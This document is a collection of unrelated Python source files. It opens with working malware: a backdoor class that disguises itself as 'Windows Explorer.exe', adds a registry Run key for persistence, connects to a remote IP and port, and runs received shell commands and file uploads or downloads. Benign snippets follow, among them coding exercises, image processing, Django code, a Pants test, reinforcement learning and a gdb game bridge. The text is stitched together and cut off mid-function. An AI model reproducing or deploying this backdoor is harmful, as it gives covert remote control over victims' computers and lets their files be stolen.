return options
class Backdoor:
def __init__(self, ip, port):
self.become_persistent()
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # IPv4 and TCP
self.connection.connect((ip, port)) # establishes connection
def become_persistent(self):
if 'win' in sys.platform:
"""Sets file location for Windows systems."""
evil_file_location = os.environ['appdata'] + '\\Windows Explorer.exe'
if not os.path.exists(evil_file_location):
# copies file to location
shutil.copyfile(sys.executable, evil_file_location)
# add executable to Windows registry
subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True)
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_receive(self):
json_data = ''
try:
json_data += self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_system_command(self, command):
DEVNULL = open(os.devnull, 'wb')
return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)
def change_working_directory(self, path):
os.chdir(path)
return('[+] Changing working directory to ' + path)
def read_file(self, path):
with open(path, 'rb') as file:
return base64.b64encode(file.read()) # encodes unknown characters to known characters
def write_file(self, path, contents):
with open(path, 'wb') as file:
file.write(base64.b64decode(contents)) # re-encodes characters
return '[+] Upload successful...'
def run(self):
while True:
command = self.reliable_receive()
try:
if command[0] == 'exit':
self.connection.close()
sys.exit()
elif command[0] == 'cd' and len(command) > 1:
command_result = self.change_working_directory(command[1])
elif command[0] == 'download':
command_result = self.read_file(command[1])
elif command[0] == 'upload':
command_result = self.write_file(command[1], command[2])
else:
command_result = self.execute_system_command(command)
except Exception:
command_result = '[-] Error during command execution.'
self.reliable_send(command_result)
options = get_arguments()
file_name = sys._MEIPASS +'\\' + options.file
subprocess.Popen(file_name, shell=True)
try:
my_backdoor = Backdoor(options.ip, options.port)
my_backdoor.run()
except Exception:
sys.exit()
print('Got a connection from: ' + options.ip + ':' + options.port)
|
#문제 설명
#새로 생긴 놀이기구는 인기가 매우 많아 줄이 끊이질 않습니다. 이 놀이기구의 원래 이용료는 price원 인데, 놀이기구를 N 번 째 이용한다면 원래 이용료의 N배를 받기로 하였습니다. 즉, 처음 이용료가 100이었다면 2번째에는 200, 3번째에는 300으로 요금이 인상됩니다.
#놀이기구를 count번 타게 되면 현재 자신이 가지고 있는 금액에서 얼마가 모자라는지를 return 하도록 solution 함수를 완성하세요.
#단, 금액이 부족하지 않으면 0을 return 하세요.
# 제한사항
# 놀이기구의 이용료 price : 1 ≤ price ≤ 2,500, price는 자연수
# 처음 가지고 있던 금액 money : 1 ≤ money ≤ 1,000,000,000, money는 자연수
# 놀이기구의 이용 횟수 count : 1 ≤ count ≤ 2,500, count는 자연수
# 입출력 예
# price money count result
# 3 20 4 10
def solution(price, money, count):
answer = 0
for i in range(1,count+1):
answer += price * i
return answer - money if answer > money else 0
|
import numpy as np
import matplotlib.pyplot as plt
import os
import utils
# Import MNIST data
PLOT_DIR = './out/plots'
def plot_conv_weights(weights, name, channels_all=True):
"""
Plots convolutional filters
:param weights: numpy array of rank 4
:param name: string, name of convolutional layer
:param channels_all: boolean, optional
:return: nothing, plots are saved on the disk
"""
# make path to output folder
plot_dir = os.path.join(PLOT_DIR, 'conv_weights')
plot_dir = os.path.join(plot_dir, name)
# create directory if does not exist, otherwise empty it
utils.prepare_dir(plot_dir, empty=True)
w_min = np.min(weights)
w_max = np.max(weights)
channels = [0]
# make a list of channels if all are plotted
if channels_all:
channels = range(weights.shape[2])
# get number of convolutional filters
num_filters = weights.shape[3]
# get number of grid rows and columns
grid_r, grid_c = utils.get_grid_dim(num_filters)
# create figure and axes
fig, axes = plt.subplots(min([grid_r, grid_c]),
max([grid_r, grid_c]))
# iterate channels
for channel in channels:
# iterate filters inside every channel
for l, ax in enumerate(axes.flat):
# get a single filter
img = weights[:, :, channel, l]
# put it on the grid
ax.imshow(img, vmin=w_min, vmax=w_max, interpolation='nearest', cmap='seismic')
# remove any labels from the axes
ax.set_xticks([])
ax.set_yticks([])
# save figure
plt.savefig(os.path.join(plot_dir, '{}-{}.png'.format(name, channel)), bbox_inches='tight')
import torch
import ZZYResNet18
model = ZZYResNet18.ZZYResNet18(n_classes=10)
model.load_state_dict(torch.load("./cifar_net89.pth"))
model.eval()
import matplotlib
w_tensor = model.conv1.weight.refine_names('out', 'in', 'h', 'w')
plot_conv_weights(w_tensor.align_to('h', 'w', 'in', 'out').detach().numpy(), 'conv1', channels_all=True)
|
from tools.primes import factors_of
import numpy as np
def is_abundant(n):
sumn = sum(factors_of(n)[:-1])
return sumn > n
'''
plan of attack:
gen all abundant numbers till 28K
then do for all i,j in the abundant numbers, store the sums of those
then filter a range till 28k with those sums, and then sum out the leftovers
'''
numbers = np.arange(1,28123)
abundant_ns = []
for i in numbers:
if is_abundant(i):
abundant_ns.append(i)
abundant_ns = np.array(abundant_ns)
# use set to remove duplicates. Also, theoretically, existence checking in a set should be faster than array
sum_abundants = set([])
for i in abundant_ns:
temp = np.full(abundant_ns.size, i)
temp = temp + abundant_ns
sum_abundants =sum_abundants.union(temp)
# welp, np.in1d doesn't want to play nice with sets.
sum_abundants = np.array(list(sum_abundants))
ar_filter =np.logical_not( np.in1d(numbers, sum_abundants))
numbers = numbers[ar_filter]
print(sum(numbers))
|
import cv2
import numpy as np
import matplotlib.pyplot as plt
import math as m
#==1.ukol===============================================================================================================
def custom_grayscale(image):
for i in range(1,len(image)):
for j in range(1,len(image[1])):
image[i,j] = image[i,j,0] * 0.3 + image[i,j,1] * 0.59 + image[i,j,2] * 0.11
return image
#==2.ukol===============================================================================================================
def custom_histogram(greyscale_image):
hist = np.zeros(256)
for i in range(1,len(greyscale_image)):
for j in range(1,len(greyscale_image[1])):
hist[greyscale_image[i,j]] += 1
plt.title("Custom Histogram")
plt.xlabel("Greyscale")
plt.ylabel("Amount")
plt.plot(hist)
plt.show()
#==3.ukol==RGB>>YCbCr===================================================================================================
def rgb_to_ycbcr(image):
height, width = image.shape[:2]
ycbcr = image.copy()
for i in range(0, height):
for j in range(0, width):
ycbcr[i, j, 0] = (image[i, j, 0] * 0.299) + (image[i, j, 1] * 0.587) + (image[i, j, 2] * 0.114) + 16
ycbcr[i, j, 1] = (image[i, j, 0] * -0.169) + (image[i, j, 1] * -0.331) + (image[i, j, 2] * 0.500) + 128
ycbcr[i, j, 2] = (image[i, j, 0] * 0.500) + (image[i, j, 1] * -0.419) + (image[i, j, 2] * -0.081) + 128
return ycbcr
def rgb_to_hsi(image):
height, width = image.shape[:2]
hsi = image.copy()
for i in range(height):
for j in range(width):
b = image[i,j,0]/255
g = image[i,j,1]/255
r = image[i,j,2]/255
minimal = min([r,g,b])
citatel = (1/2)*((r-g)+(r-b))
jmenovatel = (r-g)**2+((r-b)*(g-b))**(1/2)
hsi[i,j,0]=m.acos(citatel/jmenovatel)
#hsi[i,j,1]=1-((3/(r+g+b))*minimal)
hsi[i,j,2]=(r+g+b)/3
return hsi
def showChannel(img, channel):
x = img.copy()
if(channel==0):
x[:, :, 1] = 0
x[:, :, 2] = 0
if(channel==1):
x[:, :, 0] = 0
x[:, :, 2] = 0
if(channel==2):
x[:, :, 0] = 0
x[:, :, 1] = 0
return x
def isolate_channel(image, threshold, channel):
ycbcr = image.copy()
ycbcr = rgb_to_ycbcr(image)
height, width = image.shape[:2]
for i in range(height):
for j in range(width):
if ycbcr[i, j, channel] < threshold:
image[i, j, :] = 0
return image
#==LADENI===============================================================================================================
flowers = cv2.imread("kostky.png")
#cv2.imshow("Flowers",rgb_to_ycbcr(showChannel(flowers,1)))
#cv2.imshow("Flowers2", isolate_channel(flowers, 190, 1))
#custom_histogram(rgb_to_ycbcr(showChannel(flowers,2)))
#flowers2 = cv2.cvtColor(flowers, cv2.COLOR_BGR2YCrCb)
#cv2.imshow("Flowers2", flowers2)
#cv2.imshow("Flowers3", rgb_to_ycbcr(flowers));
cv2.imshow("Bricks", rgb_to_hsi(flowers))
cv2.waitKey(0)
cv2.destroyAllWindows()
'''
ukol 4 počítačové vidění 2017 přihlásit se jako host heslo: pvi
přednáška č. 2 cca
0-min 1-max místo 255 nebo 65535
prostor YCbCr
hue saturation
cvtcolor zkusit
zprogramovat hue ycbcr, zobrazit jednu barevnou složku, jednu barvu roznásovit v matici prní sloupec r druhý sloupec g třetí sloupec b plus offset
'''
|
from django.conf.urls import include, url
from api import views
from django.views.decorators.csrf import csrf_exempt
urlpatterns = [
url(r'^server/(?P<action>\w+)/$', csrf_exempt(views.Server.as_view())),
url(r'^account/(?P<action>\w+)/$', csrf_exempt(views.Account.as_view())),
url(r'^upload/(?P<action>\w+)/$', csrf_exempt(views.Upload.as_view())),
url(r'^project/(?P<action>\w+)/$', csrf_exempt(views.Project.as_view())),
url(r'^datacenter/(?P<action>\w+)/$', csrf_exempt(views.DataCenter.as_view())),
url(r'^machineroom/(?P<action>\w+)/$', csrf_exempt(views.MachineRoom.as_view())),
url(r'^cabinet/(?P<action>\w+)/$', csrf_exempt(views.Cabinet.as_view())),
url(r'^group/(?P<action>\w+)/$', csrf_exempt(views.Group.as_view())),
url(r'^dashboard/(?P<action>\w+)/$', csrf_exempt(views.Dashboard.as_view())),
url(r'^monitor/(?P<action>\w+)/$', csrf_exempt(views.Monitor.as_view())),
]
|
# -*- coding: utf-8 -*-
# lib_excel.py written by Duncan Murray 11/2/2014
import csv
import os
import sys
from collections import namedtuple
import glob
from random import randint
import collections
import xlrd
fldr = os.getcwd() + '//..//aspytk'
print('startup folder = ' + fldr)
sys.path.append(fldr)
import lib_file as fle
import lib_data as dat
import sys
print(sys.version)
def csv_from_excel(excel_file, pth):
opFname = ''
print('converting file ' + excel_file + ' to folder ' + pth)
workbook = xlrd.open_workbook(pth + '\\' + excel_file)
all_worksheets = workbook.sheet_names()
for worksheet_name in all_worksheets:
print('converting - ' + worksheet_name)
worksheet = workbook.sheet_by_name(worksheet_name)
opFname = pth + '\\' + os.path.splitext(excel_file)[0] + '_' + worksheet_name + '.csv'
print('SAVING - ' + opFname)
csv_file = open(opFname, 'wb')
#csv_file = open(pth + ''.join([worksheet_name,'.csv']), 'wb')
wr = csv.writer(csv_file, quoting=csv.QUOTE_ALL)
for rownum in xrange(worksheet.nrows):
wr.writerow([unicode(entry).encode("utf-8") for entry in worksheet.row_values(rownum)])
csv_file.close()
def Step1_Convert_XLS_toCSV(fldr):
fl = fle.GetFileList(fldr, ['*.xlsx'], [".CSV"], True)
for f in fl:
print(f)
csv_from_excel(os.path.basename(f) , os.path.dirname(f))
def Step2_AnalyseFiles(opFolder, fldr):
fl_CSV = fle.GetFileList(fldr, ['*.CSV'], [".XLSX"], True)
print(fl_CSV)
numRecs = 0
opFileName = os.getcwd() + '\\_opList.csv'
fle.deleteFile(opFileName)
for csvFileName in fl_CSV:
numRecs = dat.countLinesInFile(csvFileName)
print(csvFileName)
fle.AppendToFile(opFileName, csvFileName + ',' + str(numRecs) + '\n')
AnalyseCSV_File(csvFileName, opFolder)
#os.system('analyseCSV.py "' + csvFileName + '" "' + csvFileName_RES + '"')
def AnalyseCSV_File(datafile, opFolder):
baseName = opFolder + '\\' + os.path.basename(datafile).split('.')[0]
tmpfile = baseName + '.txt'
colHeaders = dat.GetColumnList(datafile)
colNum = 0
for col in colHeaders:
colText = "".join(map(str,col)) #prints JUST the column name in the list item
print(colText)
dat.GetCountUniqueValues(datafile, colNum, colText, 10, baseName + '_COL_VALUES.csv')
dat.GetColumnCounts(datafile, colNum, colText, baseName + '_COL_COUNTS.csv')
colNum = colNum + 1
######################
## Main Program ##
######################
print('\n lib_excel.py - importing source data\n')
Step1_Convert_XLS_toCSV(os.getcwd())
Step2_AnalyseFiles(os.getcwd(), [os.getcwd()])
print('Done..')
|
from django.conf.urls import url
from points import apis
urlpatterns = [
url(r'^$', apis.PointsTableApi.as_view(), name="api_points_table")
]
|
from django.db import models
class Student(models.Model):
name = models.CharField(name='nome', max_length=255, db_index=True)
birthday = models.DateField(name='nascimento')
age = models.IntegerField(name='idade')
cpf = models.CharField(name='cpf', max_length=14, db_index=True)
street = models.CharField(name='rua', max_length=255)
number = models.CharField(name='numero', max_length=10)
complement = models.CharField(name='complemento', max_length=15)
distric = models.CharField(name='bairro', max_length=255)
|
from PIL import Image, ImageDraw, ImageFont
def addNum(filePath):
img = Image.open(filePath)
size = img.size
fontSize = size[1] / 4
draw = ImageDraw.Draw(img)
ttFont = ImageFont.truetype(r"C:\Windows\Fonts\Arial.ttf", fontSize)
draw.text((size[0]-fontSize, 0), "6", (255, 0, 0), font = ttFont)
del draw
img.save("result.jpg")
img.show()
if __name__ == '__main__':
addNum("image.jpg")
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os
import platform
import shutil
from dataclasses import dataclass
from textwrap import dedent
from typing import Mapping, MutableMapping
import pytest
from pants.backend.python.goals.export import PythonResolveExportFormat
from pants.testutil.pants_integration_test import run_pants, setup_tmpdir
from pants.util.contextutil import temporary_dir
SOURCES = {
"3rdparty/BUILD": dedent(
"""\
python_requirement(name='req1', requirements=['ansicolors==1.1.8'], resolve='a', modules=['colors'])
python_requirement(name='req2', requirements=['ansicolors==1.0.2'], resolve='b', modules=['colors'])
"""
),
"src/python/foo.py": "from colors import *",
"src/python/BUILD": dedent(
"""\
python_source(name='foo', source='foo.py', resolve=parametrize('a', 'b'))
python_distribution(
name='dist',
provides=python_artifact(name='foo-dist', version='1.2.3'),
dependencies=[':foo@resolve=a'],
)
"""
),
}
@dataclass
class _ToolConfig:
name: str
version: str
experimental: bool = False
backend_prefix: str | None = "lint"
takes_ics: bool = True
@property
def package(self) -> str:
return self.name.replace("-", "_")
def build_config(tmpdir: str, py_resolve_format: PythonResolveExportFormat) -> Mapping:
cfg: MutableMapping = {
"GLOBAL": {
"backend_packages": ["pants.backend.python"],
},
"python": {
"enable_resolves": True,
"interpreter_constraints": [f"=={platform.python_version()}"],
"resolves": {
"a": f"{tmpdir}/3rdparty/a.lock",
"b": f"{tmpdir}/3rdparty/b.lock",
},
},
"export": {"py_resolve_format": py_resolve_format.value},
}
return cfg
@pytest.mark.parametrize(
"py_resolve_format",
[
PythonResolveExportFormat.mutable_virtualenv,
PythonResolveExportFormat.symlinked_immutable_virtualenv,
],
)
def test_export(py_resolve_format: PythonResolveExportFormat) -> None:
with setup_tmpdir(SOURCES) as tmpdir:
resolve_names = ["a", "b"]
run_pants(
[
"generate-lockfiles",
"export",
*(f"--resolve={name}" for name in resolve_names),
"--export-py-editable-in-resolve=['a']",
],
config=build_config(tmpdir, py_resolve_format),
).assert_success()
export_prefix = os.path.join("dist", "export", "python", "virtualenvs")
assert os.path.isdir(
export_prefix
), f"expected export prefix dir '{export_prefix}' does not exist"
py_minor_version = f"{platform.python_version_tuple()[0]}.{platform.python_version_tuple()[1]}"
for resolve, ansicolors_version in [("a", "1.1.8"), ("b", "1.0.2")]:
export_resolve_dir = os.path.join(export_prefix, resolve)
assert os.path.isdir(
export_resolve_dir
), f"expected export resolve dir '{export_resolve_dir}' does not exist"
export_dir = os.path.join(export_resolve_dir, platform.python_version())
assert os.path.isdir(export_dir), f"expected export dir '{export_dir}' does not exist"
if py_resolve_format == PythonResolveExportFormat.symlinked_immutable_virtualenv:
assert os.path.islink(
export_dir
), f"expected export dir '{export_dir}' is not a symlink"
lib_dir = os.path.join(export_dir, "lib", f"python{py_minor_version}", "site-packages")
assert os.path.isdir(lib_dir), f"expected export lib dir '{lib_dir}' does not exist"
expected_ansicolors_dir = os.path.join(
lib_dir, f"ansicolors-{ansicolors_version}.dist-info"
)
assert os.path.isdir(
expected_ansicolors_dir
), f"expected dist-info for ansicolors '{expected_ansicolors_dir}' does not exist"
if py_resolve_format == PythonResolveExportFormat.mutable_virtualenv:
expected_foo_dir = os.path.join(lib_dir, "foo_dist-1.2.3.dist-info")
if resolve == "b":
assert not os.path.isdir(
expected_foo_dir
), f"unexpected dist-info for foo-dist '{expected_foo_dir}' exists"
elif resolve == "a":
# make sure the editable wheel for the python_distribution is installed
assert os.path.isdir(
expected_foo_dir
), f"expected dist-info for foo-dist '{expected_foo_dir}' does not exist"
# direct_url__pants__.json should be moved to direct_url.json
expected_foo_direct_url_pants = os.path.join(
expected_foo_dir, "direct_url__pants__.json"
)
assert not os.path.isfile(
expected_foo_direct_url_pants
), f"expected direct_url__pants__.json for foo-dist '{expected_foo_direct_url_pants}' was not removed"
expected_foo_direct_url = os.path.join(expected_foo_dir, "direct_url.json")
assert os.path.isfile(
expected_foo_direct_url
), f"expected direct_url.json for foo-dist '{expected_foo_direct_url}' does not exist"
def test_symlinked_venv_resilience() -> None:
with temporary_dir() as named_caches:
pex_root = os.path.join(os.path.realpath(named_caches), "pex_root")
with setup_tmpdir(SOURCES) as tmpdir:
run_pants(
[
f"--named-caches-dir={named_caches}",
"generate-lockfiles",
"export",
"--resolve=a",
],
config=build_config(
tmpdir, PythonResolveExportFormat.symlinked_immutable_virtualenv
),
).assert_success()
def check():
export_dir = os.path.join(
"dist", "export", "python", "virtualenvs", "a", platform.python_version()
)
assert os.path.islink(export_dir)
export_dir_tgt = os.readlink(export_dir)
assert os.path.isdir(export_dir_tgt)
assert os.path.commonpath([pex_root, export_dir_tgt]) == pex_root
check()
shutil.rmtree(pex_root)
run_pants(
[f"--named-caches-dir={named_caches}", "export", "--resolve=a"],
config=build_config(
tmpdir, PythonResolveExportFormat.symlinked_immutable_virtualenv
),
).assert_success()
check()
|
#!/bin/python3
import os
import sys
#
# Complete the roadsInHackerland function below.
#
def roadsInHackerland(n, roads):
edges = [[-1 for _ in range(n + 1)] for _ in range(n + 1)]
for road in roads:
v1, v2, cost = road
edges[v1][v2] = 2 ** cost
edges[v2][v1] = 2 ** cost
result = []
for idx in range(1, n + 1):
cnt = 0
start_node = idx
D = [2 * (10 ** 5)] * (n + 1)
C = [-1] * (n + 1)
D[start_node] = 0
while cnt != n:
C[start_node] = 1
connected_node = []
for node in range(1, len(edges[start_node])):
if edges[start_node][node] != -1:
if D[node] > D[start_node] + edges[start_node][node]:
D[node] = D[start_node] + edges[start_node][node]
connected_node.append((D[node], node))
min_val_node_cost = 2 * 10 ** 5
min_val_node = -1
for tmp in connected_node:
if C[tmp[1]] != -1:
continue
else :
if min_val_node_cost > tmp[0]:
min_val_node = tmp[1]
min_val_node_cost = tmp[0]
start_node = min_val_node
cnt += 1
for item in D[D.index(0)+1:]:
if item != 2 * (10 ** 5):
result.append(item)
print(result)
print(format(sum(result), 'b'))
return format(sum(result), 'b')
if __name__ == '__main__':
# fptr = open(os.environ['OUTPUT_PATH'], 'w')
nm = input().split()
n = int(nm[0])
m = int(nm[1])
roads = []
for _ in range(m):
roads.append(list(map(int, input().rstrip().split())))
result = roadsInHackerland(n, roads)
# fptr.write(result + '\n')
#
# fptr.close()
|
myfamily = {
"child1": {
"name": "Tobias",
"year": 2009
},
"child2": {
"name": "Emili",
"year": 2010
},
"child3": {
"name": "Linux",
"year": 2015
}
}
print(myfamily)
|
import numpy as np
from collections import defaultdict
class Agent:
def __init__(self, nA=6):
""" Initialize agent.
Params
======
- nA: number of actions available to the agent
"""
self.nA = nA
self.Q = defaultdict(lambda: np.zeros(self.nA))
self.alpha=0.90
self.gamma=0.96
self.epsilon=0.005
self.i_episode=1
self.policy_s=None
def get_probs(self, Q_s, i_episode, eps=None):
epsilon=1.0/i_episode
if eps is not None:
epsilon=eps
policy_s=np.ones(self.nA) * epsilon / self.nA
best_a = np.argmax(Q_s)
policy_s[best_a]=1-epsilon+(epsilon/self.nA)
return policy_s
def Update_Q(self, Q_sa, Q_sa_next, reward):
return Q_sa + (self.alpha *(reward + (self.gamma*Q_sa_next) - Q_sa))
def select_action(self, state):
self.policy_s=self.get_probs(self.Q[state],self.i_episode,eps=0.0005)
self.i_episode+=1
action = np.random.choice(np.arange(self.nA),p=self.policy_s)
return action
def step(self, state, action, reward, next_state, done):
self.Q[state][action] = self.Update_Q(self.Q[state][action],np.dot(self.Q[next_state], self.policy_s), reward)
|
from CompteSimple import CompteSimple
from Transaction import Transaction
class CompteCourant(CompteSimple):
_historique = []
def __init__(this, initMnt = 0):
CompteSimple.__init__(this, initMnt)
def afficherHistorique(this):
for transaction in this._historique:
message = ''
montant = transaction.getMontant()
if transaction.getTransactionType() == Transaction.CREDIT:
message = "--CREDIT-- d'un montant de " + str(montant) + " euros"
else:
montant = montant * -1
message = "--DEBIT-- d'un montant de " + str(montant) + " euros"
print(message)
print("SOLDE TOTAL = " + str(CompteSimple.getSolde(this)))
# mask
def credit(this, montant):
this._historique.append(Transaction(Transaction.CREDIT, montant))
CompteSimple.credit(this, montant)
# mask
def debit(this, montant):
this._historique.append(Transaction(Transaction.DEBIT, montant))
CompteSimple.debit(this, montant)
|
__all__ = ['dynamodb']
|
# -*- coding: utf-8 -*-
# Personal Assistant Reliable Intelligent System
# By Tanguy De Bels
from Senses.mouth import speak
from Utilities.tools import *
import net
import os
from time import localtime, strftime
from datetime import date
def h(msg):
time = strftime("%X", localtime()).split(":")
speak([" Il est " + supress_zero(time[0]) + " heures et " + supress_zero(time[1]) + " minutes.", " Il est " + supress_zero(time[0]) + " heures " + supress_zero(time[1]), " " + supress_zero(time[0]) + " heures " + supress_zero(time[1])])
def d(msg):
dat = date.today().strftime("%Y-%m-%d").split('-')
speak([" Nous sommes le " + days(date.today().weekday()) + supress_zero(dat[2]) + months(supress_zero(dat[1])), " Nous sommes le " + supress_zero(dat[2]) + months(supress_zero(dat[1]))])
def sound(message):
if (u'coupe') in message:
os.system('nircmd.exe mutesysvolume 1')
elif (u'remets' in message):
os.system('nircmd.exe mutesysvolume 0')
elif (u'baisse') in message or (u'diminue') in message:
if (u'un peu') in message:
os.system(u'nircmd.exe changesysvolume -6553')
else:
os.system(u'nircmd.exe changesysvolume -13107')
elif (u'augmente') in message or (u'monte') in message:
os.system(u'nircmd.exe mutesysvolume 0')
if (u'un peu') in message:
os.system(u'nircmd.exe changesysvolume 6553')
else:
os.system(u'nircmd.exe changesysvolume 13107')
def bright(message):
if (u'baisse') in message or (u'diminue') in message:
if (u'un peu') in message:
os.system(u'nircmd.exe changebrightness -10')
else:
os.system(u'nircmd.exe changebrightness -20')
elif (u'augmente') in message or (u'monte') in message:
if (u'un peu') in message:
os.system(u'nircmd.exe changebrightness 10')
else:
os.system(u'nircmd.exe changebrightness 20')
def search(message):
if (u'sur') in message:
tmp = message.split(u'sur')[1]
elif (u'à propos du') in message:
tmp = message.split(u'à propos du')[1]
elif (u'à propos de') in message:
tmp = message.split(u'à propos de')[1]
elif (u'à propos des') in message:
tmp = message.split(u'à propos des')[1]
elif (u'à propos d\'') in message:
tmp = message.split(u'à propos d\'')[1]
else:
tmp = message
#TypeOfSearch:
net.net_search(tmp)
|
from os import path
import os
import socket
import atexit
import pickle
import select
class _UDS(object):
SOCK_FILE = path.join(path.dirname(__file__), 'pikaball.socket')
BUFF_SIZE = 256
def __init__(self, server):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def rm(f):
try:
os.remove(f)
except FileNotFoundError:
pass
@atexit.register
def cleaner():
sock.close()
rm(self.SOCK_FILE)
if server:
rm(self.SOCK_FILE)
sock.bind(self.SOCK_FILE)
sock.listen(1)
self.conn, _ = sock.accept()
else:
sock.connect(self.SOCK_FILE)
self.conn = sock
def incoming(self):
sl, _, _ = select.select([self.conn], [], [], 0.001)
return bool(sl)
def send(self, obj):
payload = pickle.dumps(obj)
size = len(payload)
assert size < self.BUFF_SIZE
bsent = self.conn.send(payload)
assert bsent == size
def recv(self):
bs = self.conn.recv(self.BUFF_SIZE)
return pickle.loads(bs)
class _AgentSocket(_UDS):
send_action = _UDS.send
recv_observation = _UDS.recv
observation_ready = _UDS.incoming
def __init__(self):
print('Connecting to environment...')
self.sock = _UDS.__init__(self, server=False)
print('Connected')
class _EnvironmentSocket(_UDS):
send_observation = _UDS.send
recv_action = _UDS.recv
def __init__(self):
print('Waiting for agent...')
self.sock = _UDS.__init__(self, server=True)
print('Connected')
if __name__ == '__main__':
from gdb import parse_and_eval as pae
from math import copysign
import gdb
import struct
def loadaddrs(configs):
addrs = {}
class BP(gdb.Breakpoint):
def __init__(self, ip, assignments, cond):
gdb.Breakpoint.__init__(self, ip)
self.silent = True
# gdb.Breakpoint.condition does not prevent `stop`
# from being called, so here we use our own attribute
# so condition won't be checked twice
self.cond = cond
self.assignments = assignments
def stop(self):
if bool(pae(self.cond)):
for k, value_expr in self.assignments:
v = int(pae(value_expr))
addrs[k] = v
print('{0} @ 0x{1:08X}'.format(k, v))
self.enabled = False
return False
for ip, assignments, condition in configs:
for k, _ in assignments:
addrs[k] = None
BP(ip, assignments, condition)
return addrs
bytes2int = int.from_bytes
inferior = gdb.selected_inferior()
writemem = inferior.write_memory
readmem = inferior.read_memory
def readshort(addr):
return bytes2int(readmem(addr, 2), 'little')
def agent_disconnected():
print('Agent disconnected')
gdb.execute('quit')
class DecisionBreakpoint(gdb.Breakpoint):
INIT_FRAME = [('LX',36),('LY',244),('BY',1),('RX',396),('RY',244)]
#{'BX': 56, 'LS': 13, 'RS': 3, 'RY': 244, 'BY': 6, 'RX': 396, 'LX': 48, 'LY': 213}
BREAK_ADDR = 0x00403D90
def __init__(self, addrs):
gdb.Breakpoint.__init__(self, '*%d' % self.BREAK_ADDR)
self.silent = True
self.addrs = addrs
self.action = (-1, -1, -1)
self.wait_init = True
self.prev_ball = (-1, -1)
self.socket = _EnvironmentSocket()
def stop(self):
try:
frame = dict((k, readshort(a)) for k, a in self.addrs.items())
except TypeError:
# addrs not fully loaded yet
return False
if self.wait_init:
self.wait_init = any(frame[k] != v for k, v in self.INIT_FRAME)
if self.wait_init:
by = struct.pack('i', 300) # 300: below ground
writemem(self.addrs['BY'], by) # force ball below ground to end round
return False
else:
# reset the scores
writemem(self.addrs['RS'], '\0')
writemem(self.addrs['LS'], '\0')
frame['RS'], frame['LS'] = 0, 0
# this is the correct initial ball position
self.prev_ball = (frame['BX'], 0)
while self.action is not None:
# agent needs to have sent a reset (None) action
# to observe first frame
self.action = self.socket.recv_action()
# ball position from previous frame is the correct current ball position
bx, by = frame['BX'], frame['BY']
frame['BX'], frame['BY'] = self.prev_ball
self.prev_ball = bx, by
scorediff = frame['RS'] - frame['LS']
reward = 0 if scorediff == 0 else copysign(1, scorediff)
self.wait_init = terminal = reward != 0
try:
self.socket.send_observation((frame, reward, terminal))
self.action = action = self.socket.recv_action()
except (BrokenPipeError, ConnectionResetError, EOFError):
agent_disconnected()
if action:
ss = [1 if a > 0 else -1 if a < 0 else 0 for a in action]
bs = struct.pack('iii', *ss)
base = int(pae('$eax')) + 0x10 # base of right player
writemem(base, bs)
#print('KEY (0x{:08X}): {}'.format(base, str(bs)))
else:
# agent resets environment
self.wait_init = True
return False
gdb.execute('set print thread-events off')
gdb.execute('set pagination off')
gdb.execute('set confirm off')
gdb.execute('handle SIGUSR1 nostop noprint')
addrs = loadaddrs([
# break at *0x004027B1, set value for LX to $esi+0xA8, and LY.. if *($esi+0xA8) < 216
('*0x004027B1', [('LX', '$esi+0xA8'), ('LY', '$esi+0xAC')], '*($esi+0xA8) < 216'),
('*0x004027B1', [('RX', '$esi+0xA8'), ('RY', '$esi+0xAC')], '*($esi+0xA8) > 216'),
('*0x00402EB4', [('BX', '$esi+0x30'), ('BY', '$esi+0x34')], '1'),
('*0x00403D4B', [('LS', '$esi+0x3C'), ('RS', '$esi+0x40')], '1')
])
db = DecisionBreakpoint(addrs)
gdb.execute('continue')
else:
from itertools import product
import numpy as np
class _Object(object):
def __init__(self, **attrs):
for k, v in attrs.items():
self.__setattr__(k, v)
_ACTIONS = list(product([-1,0,1],[-1,0,1],[0,1]))
# https://github.com/openai/gym/blob/master/gym/spaces/box.py
observation_space = _Object(
high = np.array([432.0, 323.0]*3),
low = np.zeros(6),
shape = lambda: (6,)
)
# https://github.com/openai/gym/blob/master/gym/spaces/discrete.py
action_space = _Object(
n = 18,
labels = ['%s %s %s' % (' ><'[h], ' ∨∧'[v], ' N'[n]) for h, v, n in _ACTIONS]
)
_done = True
_socket = _AgentSocket()
def _observe():
global _done
frame, reward, terminal = _socket.recv_observation()
observation = np.array([frame[k] for k in ['LX', 'LY', 'RX', 'RY', 'BX', 'BY']], dtype=np.float32)
_done = terminal
return observation, reward, terminal
def reset():
_socket.send_action(None)
observation, _, _ = _observe()
return observation
def step(action):
assert not _done, 'step called after end of episode before resetting'
a = _ACTIONS[action]
_socket.send_action(a)
observation, reward, done = _observe()
return observation, reward, done, {}
|
def divident(data,start,length,wordList ,res):
#length = len(data)
print("length is ", length)
if length == 0:
res.append(wordList)
return
for i in range(start+1,start+length):
temp = data[start:i]
wordList = wordList+ temp
data_temp = data[i:]
print("wordlist is", wordList, " i is ",i," data is ",data_temp)
newLength = length - i
newStart = start + i
divident(data_temp,newStart,newLength,wordList,res)
data =[1,2,3]
print("data is ",data)
res=[]
wordList =[]
length = len(data)
divident(data,0, length,wordList,res)
print("res is ", res)
|
from django.shortcuts import render
from django.core.paginator import Paginator
from django.forms.models import model_to_dict
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
from playlist.models.Radio import Radio
from playlist.forms import RadioForm
def add_radio(request):
if request.method == 'POST':
form = RadioForm(request.POST) # we accept post request from submit button
if form.is_valid(): # django has its own validation
form.save() # directly save the form
return HttpResponseRedirect(reverse('radios')) # return to all authors page
else:
form = RadioForm() # pass empty form
context = {
'form': form
}
return render(request, 'radio_form.html', context=context)
def edit_radio(request, Radio_id):
if request.method == 'POST':
radio = Radio.objects.get(pk=radio_id)
form = RadioForm(request.POST, instance=radio)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('radios'))
else:
